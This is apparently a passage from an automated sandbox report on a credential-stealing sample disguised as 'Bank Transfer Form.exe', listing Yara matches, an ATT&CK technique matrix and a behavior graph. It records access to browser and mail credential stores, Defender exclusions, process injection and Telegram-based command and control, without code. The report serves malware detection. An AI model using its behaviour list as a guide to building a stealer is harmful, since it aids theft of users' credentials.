                Source: Yara matchFile source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4140066639.000000000338C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4990830.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.3ddcbf0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.Bank Transfer Form.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.4909010.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Bank Transfer Form.exe.48817f0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Bank Transfer Form.exe PID: 7596, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                13
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
                Screen Capture
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Software Packing
                NTDS1
                Security Software Discovery
                Distributed Component Object Model1
                Email Collection
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp
                LSA Secrets1
                Process Discovery
                SSH1
                Input Capture
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials31
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                System Network Configuration Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1619055 Sample: Bank Transfer Form.exe Startdate: 19/02/2025 Architecture: WINDOWS Score: 100 22 reallyfreegeoip.org 2->22 24 api.telegram.org 2->24 26 2 other IPs or domains 2->26 34 Suricata IDS alerts for network traffic 2->34 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 44 14 other signatures 2->44 8 Bank Transfer Form.exe 4 2->8         started        signatures3 40 Tries to detect the country of the analysis system (by using the IP) 22->40 42 Uses the Telegram API (likely for C&C communication) 24->42 process4 file5 20 C:\Users\user\...\Bank Transfer Form.exe.log, ASCII 8->20 dropped 46 Adds a directory exclusion to Windows Defender 8->46 48 Injects a PE file into a foreign processes 8->48 12 Bank Transfer Form.exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        signatures6 process7 dnsIp8 28 api.telegram.org 149.154.167.220, 443, 49753 TELEGRAMRU United Kingdom 12->28 30 checkip.dyndns.com 193.122.130.0, 49734, 49738, 49741 ORACLE-BMC-31898US United States 12->30 32 reallyfreegeoip.org 104.21.80.1, 443, 49735, 49736 CLOUDFLARENETUS United States 12->32 50 Tries to steal Mail credentials (via file / registry access) 12->50 52 Tries to harvest and steal browser information (history, passwords, etc) 12->52 54 Loading BitLocker PowerShell Module 16->54 18 conhost.exe 16->18         started        signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.